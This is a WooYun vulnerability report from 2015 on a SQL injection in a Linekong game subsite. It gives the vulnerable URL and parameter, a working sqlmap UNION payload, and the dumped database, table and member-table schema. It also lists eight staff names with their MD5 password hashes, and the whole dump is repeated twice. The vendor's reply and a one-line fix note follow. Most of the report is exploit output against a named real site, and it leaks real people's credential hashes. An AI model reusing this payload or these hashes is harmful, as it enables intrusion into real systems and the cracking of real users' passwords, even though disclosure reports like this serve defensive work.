蓝港又一分站SQL注入 | wooyun-2015-0118746

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0118746

漏洞标题：

蓝港又一分站SQL注入

漏洞详情

披露状态：

2015-06-08：细节已通知厂商并且等待厂商处理中
2015-06-09：厂商已经确认，细节仅向厂商公开
2015-06-19：细节向核心白帽子及相关领域专家公开
2015-06-29：细节向普通白帽子公开
2015-07-09：细节向实习白帽子公开
2015-07-24：细节向公众公开

简要描述：

求高RANK

详细说明：

注入点：

http://fr.linekong.com/xml/common.php?sort_id=*

sort_id参数存在sql注入

sqlmap identified the following injection points with a total of 2179 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
    Vector:  UNION ALL SELECT 92,[QUERY],92,92#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] fr_web
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
[28 tables]
+-------------------------+
| fr_activity_newcard_log |
| fr_address              |
| fr_article              |
| fr_article_inserl       |
| fr_build                |
| fr_channel              |
| fr_columns              |
| fr_comment              |
| fr_download             |
| fr_editors_inserl       |
| fr_flash                |
| fr_grading              |
| fr_group                |
| fr_image                |
| fr_image_inserl         |
| fr_member               |
| fr_passportstat         |
| fr_sort                 |
| fr_template             |
| fr_url                  |
| fr_url_inserl           |
| fr_vote                 |
| fr_vote_inserl          |
| fr_vote_option          |
| fr_wj_article           |
| fr_wj_article_inserl    |
| fr_wj_image             |
| fr_wj_image_inserl      |
+-------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
Table: fr_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
Table: fr_member
[8 entries]
+-----------+----------------------------------+
| user_name | user_passwd                      |
+-----------+----------------------------------+
| 董勇        | 862f3760ca3293437b53cac01b0ffe29 |
| 实习生       | 003be2507cfad94f1efb32fe3fd0d0ec |
| 王磊        | e10adc3949ba59abbe56e057f20f883e |
| 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师   | cbef2ead7978557272b0c692f356b3cd |
| 李治        | cd9dac6dbb33988a3214e7ba85d272fc |
| 张静        | b1d8fcdf6d0db7011c71fc30e7aef4a4 |
| 韩秋莹       | 2f090f77c0d55fdf508e324140050160 |
+-----------+----------------------------------+

漏洞证明：

sqlmap identified the following injection points with a total of 2179 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
    Vector:  UNION ALL SELECT 92,[QUERY],92,92#
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] fr_web
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
[28 tables]
+-------------------------+
| fr_activity_newcard_log |
| fr_address              |
| fr_article              |
| fr_article_inserl       |
| fr_build                |
| fr_channel              |
| fr_columns              |
| fr_comment              |
| fr_download             |
| fr_editors_inserl       |
| fr_flash                |
| fr_grading              |
| fr_group                |
| fr_image                |
| fr_image_inserl         |
| fr_member               |
| fr_passportstat         |
| fr_sort                 |
| fr_template             |
| fr_url                  |
| fr_url_inserl           |
| fr_vote                 |
| fr_vote_inserl          |
| fr_vote_option          |
| fr_wj_article           |
| fr_wj_article_inserl    |
| fr_wj_image             |
| fr_wj_image_inserl      |
+-------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
Table: fr_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: MySQL UNION query (92) - 4 columns
    Payload: http://fr.linekong.com:80/xml/common.php?sort_id=' UNION ALL SELECT 92,CONCAT(0x7178707871,0x61676f74467957576955,0x7170707671),92,92#
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: fr_web
Table: fr_member
[8 entries]
+-----------+----------------------------------+
| user_name | user_passwd                      |
+-----------+----------------------------------+
| 董勇        | 862f3760ca3293437b53cac01b0ffe29 |
| 实习生       | 003be2507cfad94f1efb32fe3fd0d0ec |
| 王磊        | e10adc3949ba59abbe56e057f20f883e |
| 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师   | cbef2ead7978557272b0c692f356b3cd |
| 李治        | cd9dac6dbb33988a3214e7ba85d272fc |
| 张静        | b1d8fcdf6d0db7011c71fc30e7aef4a4 |
| 韩秋莹       | 2f090f77c0d55fdf508e324140050160 |
+-----------+----------------------------------+

修复方案：

参数过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-06-09 14:45

厂商回复：

感谢提出的问题，该项目已下线，我们准备进行下线操作

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云